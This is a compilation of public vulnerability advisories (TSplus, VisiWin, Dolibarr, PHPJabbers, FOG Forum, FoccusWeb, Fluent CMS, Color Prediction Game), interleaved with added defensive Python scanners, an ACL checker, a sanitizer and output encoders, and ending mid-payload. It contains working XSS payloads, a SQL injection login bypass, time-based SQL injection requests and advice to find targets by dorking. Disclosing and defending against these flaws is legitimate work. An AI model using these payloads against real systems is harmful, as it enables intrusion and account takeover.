<pre><code># Exploit Title: TSplus 16.0.0.0 - Remote Work Insecure Files and Folders Permissions<br /># Date: 2023-08-09<br /># Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia<br /># Vendor Homepage: https://tsplus.net/<br /># Version: Up to 16.0.0.0<br /># Tested on: Windows<br /># CVE : CVE-2023-31068<br /><br />With TSplus Remote Work (v. 16.0.0.0) you can create a secure single <br />sign-on web portal and remote desktop gateway that enables users to <br />remotely access the console session of their office PC.<br />The solution comes with an embedded web server so that remote users <br />can connect easily.<br />However, the installer sets insecure file and folder permissions: <br />Everyone is granted Full Control on the web root and its contents, so <br />any local user (not only administrators) can manipulate served content <br />(e.g. the HTML pages or JS scripts) or replace legitimate files (e.g. <br />Setup-RemoteWork-Client.exe, the client installer served from the <br />download folder) in order to compromise a system or to gain elevated <br />privileges.<br />The (OI)(CI) flags on the folders mean the Full Control entry is <br />inherited by every file and subfolder created beneath them, so files <br />added after installation are exposed as well.<br /><br />This is the list of insecure files and folders with their respective <br />permissions:<br /><br />Permission: Everyone:(OI)(CI)(F)<br /><br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\prints<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads\shared<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\locales<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\des<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\topmenu<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key\parts<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\cp<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\srv<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\images<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\images\bramus<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var\log<br /><br />-------------------------------------------------------------------------------------------<br /><br />Permission: Everyone:(F)<br /><br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\robots.txt<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\hb.exe.config<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp\index.html<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\common.js<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\lang.js<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\Setup-RemoteWork-Client.exe<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\jwwebsockify.jar<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\web.jar<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitlist.html<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitupload.html<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\index.html<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\index.html<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\port.bin<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\jws.js<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\sha256.js<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype\prototype.js<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js\jquery.min.js<br /><br /></code></pre>
<pre><code># Exploit Title: TSplus 16.0.0.0 - Remote Work Insecure Credential Storage<br /># Date: 2023-08-09<br /># Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia<br /># Vendor Homepage: https://tsplus.net/<br /># Version: Up to 16.0.0.0<br /># Tested on: Windows<br /># CVE : CVE-2023-31069<br /><br />With TSplus Remote Work (v. 16.0.0.0) you can create a secure single <br />sign-on web portal and remote desktop gateway that enables users to <br />remotely access the console session of their office PC.<br />It is possible to create a custom web portal login page which allows a <br />user to log in without providing their credentials.<br />However, the credentials are stored insecurely: they are saved in <br />cleartext inside the HTML login page itself.<br />This means that anyone who can reach the web login page (which, being <br />the login page, is reachable before any authentication) can retrieve <br />the credentials for the application simply by viewing the page source.<br /><br />This is a code snippet extracted from the source code of the login page <br />(var user and var pass):<br /><br /> // --------------- Access Configuration ---------------<br /> var user = "Admin"; // Login to use when connecting to the remote server (leave "" to use the login typed in this page)<br /> var pass = "SuperSecretPassword"; // Password to use when connecting to the remote server (leave "" to use the password typed in this page)<br /> var domain = ""; // Domain to use when connecting to the remote server (leave "" to use the domain typed in this page)<br /> var server = "127.0.0.1"; // Server to connect to (leave "" to use localhost and/or the server chosen in this page)<br /> var port = ""; // Port to connect to (leave "" to use localhost and/or the port of the server chosen in this page)<br /> var lang = "as_browser"; // Language to use<br /> var serverhtml5 = "127.0.0.1"; // Server to connect to, when using HTML5 client<br /> var porthtml5 = "3389"; // Port to connect to, when using HTML5 client<br /> var cmdline = ""; // Optional text that will be put in the server's clipboard once connected<br /> // --------------- End of Access Configuration ---------------<br /><br />As the comments in the page state, leaving user and pass as "" makes <br />the portal use what the user types, which is the configuration to <br />prefer over embedding an account in the page.<br /><br /></code></pre>
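<p>An added example (not from the advisory and not TSplus code) of how to audit a deployed login page for this issue: it pulls the Access Configuration variables out of the page's script blocks and reports a finding only when user or pass is non-empty, which, per the comments in the snippet above, is the condition under which the page carries a working account. The sample page is constructed from the snippet; the variable names are the ones the snippet uses, and the rest of the page layout is an assumption.</p>

```python
import re
from html.parser import HTMLParser

# Constructed sample page, modelled on the "Access Configuration" block quoted
# in the advisory. It is not a file taken from a real TSplus installation.
SAMPLE_LOGIN_PAGE = """<html><head><title>Remote Work</title>
<script type="text/javascript">
 // --------------- Access Configuration ---------------
 var user = "Admin";                // Login to use when connecting to the remote server
 var pass = "SuperSecretPassword";  // Password to use when connecting
 var domain = "";
 var server = "127.0.0.1";
 var port = "";
 var serverhtml5 = "127.0.0.1";
 var porthtml5 = "3389";
 // --------------- End of Access Configuration ---------------
</script></head><body><form>...</form></body></html>
"""

# Only the variable names the TSplus page uses are of interest.
ASSIGN_RE = re.compile(
    r'\bvar\s+(user|pass|domain|server|port|serverhtml5|porthtml5)\s*=\s*"([^"]*)"')


class ScriptCollector(HTMLParser):
    """Collect the raw text of every <script> element in the page."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


def extract_access_config(html_text):
    """Return {name: value} for the `var name = "value"` lines in the page's scripts."""
    collector = ScriptCollector()
    collector.feed(html_text)
    collector.close()
    config = {}
    for script in collector.scripts:
        for name, value in ASSIGN_RE.findall(script):
            config[name] = value
    return config


def find_embedded_credentials(html_text):
    """Return a finding when the page carries a non-empty user or pass, else None.

    The page's own comments say an empty string means "use what the user
    types", so only non-empty values are reported.
    """
    cfg = extract_access_config(html_text)
    user, password = cfg.get("user", ""), cfg.get("pass", "")
    if not user and not password:
        return None
    targets = {cfg.get("server", ""), cfg.get("serverhtml5", "")} - {""}
    return {
        "user": user,
        "password_present": bool(password),  # the value itself is not copied into reports
        "domain": cfg.get("domain", ""),
        "targets": sorted(targets),          # hosts the embedded account grants access to
    }


if __name__ == "__main__":
    print(find_embedded_credentials(SAMPLE_LOGIN_PAGE))
```

<p>Run against a page fetched from the portal (unauthenticated, as the advisory notes), the finding names the account and the RDP targets it opens; the password itself is deliberately not echoed so the scanner's own output does not become a second copy of the secret.</p>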
<pre><code># Exploit Title: Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions Privilege Escalation<br /># Date: 2023-08-09<br /># Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia<br /># Vendor Homepage: https://www.inosoft.com/<br /># Version: Up to 2022-2.1 (Runtime RT7.3 RC3 20221209.5)<br /># Tested on: Windows<br /># CVE: CVE-2023-31468<br /><br />Inosoft VisiWin is a completely open system with a configurable range of <br />functions. It combines all features of classic HMI software with <br />unlimited programming possibilities.<br />The installer creates its folders with insecure permissions: Everyone <br />is granted Full Control on the installation root, and that entry is <br />inherited by everything below it. This allows a malicious local user <br />to manipulate file content or replace legitimate files (e.g., <br />VisiWin7.Server.Manager.exe, which runs with SYSTEM privileges) to <br />compromise the system or to gain elevated privileges.<br /><br />This is the list of insecure files and folders with their respective <br />permissions:<br /><br />C:\>icacls "C:\Program Files (x86)\INOSOFT GmbH"<br />C:\Program Files (x86)\INOSOFT GmbH BUILTIN\Administrators:(OI)(CI)(F)<br />                                    Everyone:(OI)(CI)(F)<br />                                    NT AUTHORITY\SYSTEM:(OI)(CI)(F)<br /><br />Successfully processed 1 files; Failed processing 0 files<br /><br />C:\><br /><br />--------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />C:\>icacls "C:\Program Files (x86)\INOSOFT GmbH\VisiWin7\Runtime\VisiWin7.Server.Manager.exe"<br />C:\Program Files (x86)\INOSOFT GmbH\VisiWin 7\Runtime\VisiWin7.Server.Manager.exe BUILTIN\Administrators:(I)(F)<br />                                    Everyone:(I)(F)<br />                                    NT AUTHORITY\SYSTEM:(I)(F)<br /><br />Successfully processed 1 files; Failed processing 0 files<br /><br />C:\><br /><br />The (I) flag on the executable shows that its Everyone:(F) entry is <br />inherited from the (OI)(CI) entry on the installation root, so the <br />ACL must be corrected at the root (and propagated) rather than on <br />individual files; a replaced VisiWin7.Server.Manager.exe would be <br />executed as SYSTEM the next time the service starts.<br /><br /></code></pre>
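<p>A check for the permission weakness described in this advisory and in the TSplus one above, added here as an example (it is not code from either advisory or vendor): it parses icacls output of the layout shown and flags ACEs that grant write, modify or full control to principals every local user belongs to. The listings it reads are constructed, modelled on the output above; the set of low-privilege principals and the set of rights treated as write access are assumptions of the example.</p>

```python
import re

# Constructed icacls listings in the layout the tool prints, modelled on the
# VisiWin output above (the TSplus entries would be reported the same way).
SAMPLE_ROOT = r"""C:\Program Files (x86)\INOSOFT GmbH BUILTIN\Administrators:(OI)(CI)(F)
                                    Everyone:(OI)(CI)(F)
                                    NT AUTHORITY\SYSTEM:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""
SAMPLE_EXE = r"""C:\Program Files (x86)\INOSOFT GmbH\VisiWin 7\Runtime\VisiWin7.Server.Manager.exe BUILTIN\Administrators:(I)(F)
                                    Everyone:(I)(F)
                                    NT AUTHORITY\SYSTEM:(I)(F)
"""
SAMPLE_OK = r"""C:\Program Files\Good Vendor BUILTIN\Administrators:(OI)(CI)(F)
                            NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                            BUILTIN\Users:(OI)(CI)(RX)
                            Everyone:(DENY)(W)
"""

# Principals any local user falls under; write access for these is a finding.
LOW_PRIV_PRINCIPALS = {
    "everyone", "builtin\\users", "users",
    "nt authority\\authenticated users", "authenticated users",
    "nt authority\\interactive",
}
# Simple and specific icacls rights that allow changing the object or its ACL.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "DC", "WDAC", "WO"}

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([^)]*\))+)\s*$")


def parse_icacls(path, output):
    """Return [(principal, [flag, ...])] for the icacls listing of `path`.

    `path` is the argument that was given to icacls. Its first output line
    starts with that path, and stripping it removes the ambiguity between
    spaces in the path and spaces in the principal name.
    """
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):
            line = line[len(path):].strip()
        match = ACE_RE.match(line)
        if match:
            flags = re.findall(r"\(([^)]*)\)", match.group("flags"))
            aces.append((match.group("principal").strip(), flags))
    return aces


def weak_aces(path, output):
    """ACEs that grant write, modify or full control to a low-privilege principal."""
    findings = []
    for principal, flags in parse_icacls(path, output):
        rights = {r.strip() for f in flags for r in f.split(",")}
        if "DENY" in rights or principal.lower() not in LOW_PRIV_PRINCIPALS:
            continue
        granted = sorted(rights & WRITE_RIGHTS)
        if granted:
            findings.append({
                "principal": principal,
                "rights": granted,
                "inherited": "I" in rights,            # came from a parent folder
                "propagates": {"OI", "CI"} <= rights,  # will be inherited by children
            })
    return findings


if __name__ == "__main__":
    for finding in weak_aces(r"C:\Program Files (x86)\INOSOFT GmbH", SAMPLE_ROOT):
        print(finding)
```

<p>The inherited flag is what tells the remediation apart: a finding with inherited set and propagates unset (the executable) is fixed by correcting the parent that propagates it, not by editing the file's own ACL.</p>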
<pre><code># Exploit Title: Dolibarr Version 17.0.1 - Stored XSS<br /># Dork: <br /># Date: 2023-08-09<br /># Exploit Author: Furkan Karaarslan<br /># Category : Webapps<br /># Vendor Homepage: https://www.dolibarr.org/<br /># Version: 17.0.1<br /># Tested on: Windows/Linux<br /># CVE : <br /><br />Stored XSS through the public note of a user record: the note_public <br />field submitted to /htdocs/user/note.php (action=setnote_public) <br />accepts an &lt;a&gt; element carrying an onscrollend event handler together <br />with an overflow:auto box filled with &lt;br&gt; elements, and the stored note <br />is rendered back with the handler intact. Whenever the note is viewed <br />and the box is scrolled, the handler runs in the viewer's session.<br /><br />Decoded note_public payload (the run of &lt;br&gt; elements is abbreviated):<br /><br />&lt;a onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;span id=x&gt;test&lt;/span&gt;&lt;/a&gt;<br /><br />-----------------------------------------------------------------------------<br />Request<br /><br />POST /dolibarr-17.0.1/htdocs/user/note.php HTTP/1.1<br />Host: 127.0.0.1<br />Content-Length: 599<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://127.0.0.1<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php?action=editnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: 5c8ccd93504819395bd9eb83add769eb=g6sujc3ss8cj53cvk84qv0jgol; f758a1cd0925196cd7746824e3df122b=u04rsmdqgrdpr2kduo49gl0rmh; DOLSESSID_18109f368bbc82f2433d1d6c639db71bb97e2bd1=sud22bsu9sbqqc4bgcloki2eht<br />Connection: close<br /><br />token=4b1479ad024e82d298b395bfab9b1916&action=setnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1&note_public=%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3Bborder%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E&modify=De%C4%9Fi%C5%9Ftir<br /><br /></code></pre>
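<p>The practitioner's point in this advisory is that onscrollend is a comparatively new event name, so a sanitizer that strips a fixed list of known on* attributes can miss it while an allowlist rejects it with no update. The block below is an added example of the allowlist approach applied to the stored note (it is not Dolibarr's code, and Dolibarr's actual filtering is not shown on this page). It assumes the note is rendered as HTML; the particular tags and attributes allowed are a choice made for the example, and the run of br elements in the copied payload is shortened.</p>

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# The note_public value from the request above (copied URL-encoded); the
# run of <br> elements that makes the box scrollable is shortened here.
ENCODED_NOTE = (
    "%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3B"
    "border%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E"
    + "%3Cbr%3E" * 6
    + "%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E"
)

# Allowlist (an assumption of the example): anything not listed is dropped,
# so a new event name such as onscrollend needs no blocklist entry.
ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "br", "span", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "span": {"id", "class"}, "p": {"class"}}
VOID_TAGS = {"br"}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")


class AllowlistSanitizer(HTMLParser):
    """Re-serialise input keeping only allowlisted tags and attributes.

    html.parser does not validate nesting, so this is an illustration of the
    policy, not a replacement for a maintained sanitizer library.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []  # (tag, attr) removed; attr is None when the whole tag went

    @staticmethod
    def _safe_value(name, value):
        if name == "href":  # rejects javascript:, data:, vbscript: and relative tricks
            return (value or "").strip().lower().startswith(SAFE_URL_SCHEMES)
        return True

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append((tag, None))
            return
        kept = []
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, set()) and self._safe_value(name, value):
                kept.append((name, value or ""))
            else:
                self.dropped.append((tag, name))
        attr_text = "".join(f' {n}="{html.escape(v, quote=True)}"' for n, v in kept)
        self.out.append(f"<{tag}{attr_text}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-escaped, so entities decoded on the way in cannot become markup.
        self.out.append(html.escape(data, quote=False))


def sanitize_note(note_html):
    """Return (clean_html, dropped) for a stored note body."""
    sanitizer = AllowlistSanitizer()
    sanitizer.feed(note_html)
    sanitizer.close()
    return "".join(sanitizer.out), sanitizer.dropped


def decode_note(encoded):
    """Form-decode a note_public value as the server would see it."""
    return unquote_plus(encoded)


if __name__ == "__main__":
    clean, dropped = sanitize_note(decode_note(ENCODED_NOTE))
    print(clean)
    print(dropped)
```

<p>The dropped list is worth logging: a stored note that loses an event-handler attribute on save is a strong signal of an attempted injection against whoever views that record.</p>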
<pre><code># Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities<br /># Date: 09/08/2023<br /># Exploit Author: Kerimcan Ozturk<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/business-directory-script/<br /># Version: 3.2<br /># Tested on: Windows 10 Pro<br /><br />## Description<br /><br />The tab_id parameter of the admin listing editor is reflected into the <br />page without output encoding. A logged-in administrator who follows a <br />crafted link therefore gets attacker-controlled script or markup <br />rendered in the admin context.<br /><br />Technical Detail / POC<br />==========================<br />Log in to the admin account.<br />Go to the listings page (<br />https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)<br />Edit any listing (<br />https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57<br />)<br /><br />[1] Cross-Site Scripting (XSS)<br /><br />Request:<br />https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=<br />"&lt;script&gt;&lt;image/src/onerror=prompt(8)&gt;<br /><br />[2] HTML Injection (listed by the author as Cross-Site Request Forgery; <br />the payload injects markup into the page, it does not forge a <br />state-changing request)<br /><br />Request:<br />https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=<br />"&lt;script&gt;&lt;font%20color="green"&gt;Kerimcan%20Ozturk&lt;/font&gt;<br /><br />Best Regards<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : FOG Forum v0.8 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://fogproject.org/ |<br />| # Dork : Powered by FOG Forum 0.8 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Find targets by dorking in Google or another search engine.<br /><br />[+] This vulnerability affects: /forum/fen.php.<br /><br />[+] Attack details:<br /><br /> The URI was set to ;904045'():;984994<br /> The input is reflected inside a &lt;script&gt; tag between single quotes, <br /> so the single quote in the payload closes the JavaScript string literal <br /> and what follows is parsed as script.<br /><br />[+] This vulnerability affects: /forum/index.php.<br /><br />[+] Attack details:<br /><br /> The URL-encoded GET input fog_action was set to 1" onmouseover=prompt(984696) bad="<br /> The input is reflected inside a tag attribute between double quotes, <br /> so the double quote closes the attribute value and onmouseover becomes <br /> a new attribute of the same tag.<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>======================================================================================================================================<br />| # Title : FoccusWeb CMS v0.1 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : http://www.foccusweb.com/site/ | <br />======================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Find targets by dorking in Google or another search engine.<br /><br />[+] The txt-busca parameter of the search results page is reflected without encoding.<br /><br />[+] Use payload : /resultados.html?txt-busca=1&lt;script&gt;alert(/indoushka/);&lt;/script&gt;&yt0=submit<br /><br />[+] http://127.0.0.1/saogabrielrsgovbr/Portal/busca/resultados.html?txt-busca=1%3Cscript%3Ealert(/indoushka/);%3C/script%3E&yt0=submit<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
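<p>The three reflected XSS findings above (PHPJabbers tab_id, FOG fen.php and index.php, FoccusWeb txt-busca) each land in a different output context, and the FOG advisory names two of them explicitly: a JavaScript string between single quotes and an attribute value between double quotes. The fix is to choose the encoder by context rather than apply one escape everywhere. The block below is an added example, not code from any of those products: the rendering functions are a constructed stand-in page that reflects the three payloads copied from the advisories, and the Inspector class uses Python's html.parser as a proxy for how a browser would tokenise the result.</p>

```python
import html
import json
from html.parser import HTMLParser

# Payloads copied from the advisories above; the page context each one lands
# in decides which encoder neutralises it.
FOG_URI_PAYLOAD = "904045'():;984994"                       # inside <script>, between single quotes
FOG_ACTION_PAYLOAD = '1" onmouseover=prompt(984696) bad="'  # inside an attribute, between double quotes
BUSCA_PAYLOAD = "1<script>alert(/indoushka/);</script>"     # in element text


def encode_for_html_text(value):
    return html.escape(value, quote=False)


def encode_for_html_attr(value):
    # quote=True also converts " and ' so the value cannot end the attribute.
    return html.escape(value, quote=True)


def encode_for_js_string(value):
    # json.dumps escapes ", \ and control characters; the extra replacements
    # cover the single-quote context and keep "</script>" out of the literal.
    body = json.dumps(value)[1:-1]
    for ch, esc in (("'", "\\u0027"), ("<", "\\u003c"), (">", "\\u003e"),
                    ("&", "\\u0026"), ("/", "\\/")):
        body = body.replace(ch, esc)
    return body


def render_vulnerable(uri, action, query):
    """Constructed stand-in page that reflects all three values verbatim."""
    return (f"<script>var u = '{uri}';</script>"
            f'<input name="fog_action" value="{action}">'
            f"<p>Results for {query}</p>")


def render_safe(uri, action, query):
    """The same page with the encoder matching each context."""
    return (f"<script>var u = '{encode_for_js_string(uri)}';</script>"
            f'<input name="fog_action" value="{encode_for_html_attr(action)}">'
            f"<p>Results for {encode_for_html_text(query)}</p>")


class Inspector(HTMLParser):
    """Record what a browser-like tokeniser makes of a rendered fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []         # start tags in document order
        self.input_attrs = {}  # attributes of the first <input>
        self.script_text = ""  # text of all <script> elements
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input" and not self.input_attrs:
            self.input_attrs = dict(attrs)
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text += data


def inspect(fragment):
    parser = Inspector()
    parser.feed(fragment)
    parser.close()
    return parser


if __name__ == "__main__":
    print(render_vulnerable(FOG_URI_PAYLOAD, FOG_ACTION_PAYLOAD, BUSCA_PAYLOAD))
    print(render_safe(FOG_URI_PAYLOAD, FOG_ACTION_PAYLOAD, BUSCA_PAYLOAD))
```

<p>In the safe rendering the attribute value survives byte for byte once the parser decodes the entities, so the encoding costs nothing functionally; the only thing that changes is that the quote can no longer terminate the attribute, and the single quote can no longer terminate the JavaScript literal.</p>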
<pre><code>====================================================================================================================================<br />| # Title : Fluent CMS V 1.0.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 77.0.1(32-bit) | <br />| # Vendor : http://www.fluenttechnology.com/ | <br />| # Dork : "Developed By - Fluent Technology" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Find targets by dorking in Google or another search engine.<br /><br />[+] Use Payload : User & Pass : 1' or 1=1 -- -<br /><br />[+] The quote closes the string literal in the login query, or 1=1 makes the WHERE clause true and -- - comments out the rest of the statement, so the login succeeds without valid credentials (SQL injection).<br /><br />[+] admin Panel : /fluentcms/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Color Prediction Game v1.0 - SQL Injection<br /># Date: 2023-08-12<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script<br /># Tested on: Kali Linux & MacOS<br /># CVE: N/A<br /><br />The login_mobile field of the login form (POST /loginNow.php) is used <br />in the database query without parameter binding. The request below is <br />the login request itself, so the injection is reachable before <br />authentication; sqlmap confirmed it as time-based blind (MySQL SLEEP).<br /><br />### Request ###<br /><br />POST /loginNow.php HTTP/1.1<br />Host: localhost<br />Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0<br />Accept: */*<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------395879129218961020344050490865<br />Content-Length: 434<br />Origin: http://localhost<br />Referer: http://localhost/login.php<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />-----------------------------395879129218961020344050490865<br />Content-Disposition: form-data; name="login_mobile"<br /><br />4334343433<br />-----------------------------395879129218961020344050490865<br />Content-Disposition: form-data; name="login_password"<br /><br />123456<br />-----------------------------395879129218961020344050490865<br />Content-Disposition: form-data; name="action"<br /><br />login<br />-----------------------------395879129218961020344050490865--<br /><br />### Parameter & Payloads ###<br /><br />Parameter: MULTIPART login_mobile ((custom) POST)<br />Type: time-based blind<br />Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />Payload: -----------------------------395879129218961020344050490865<br 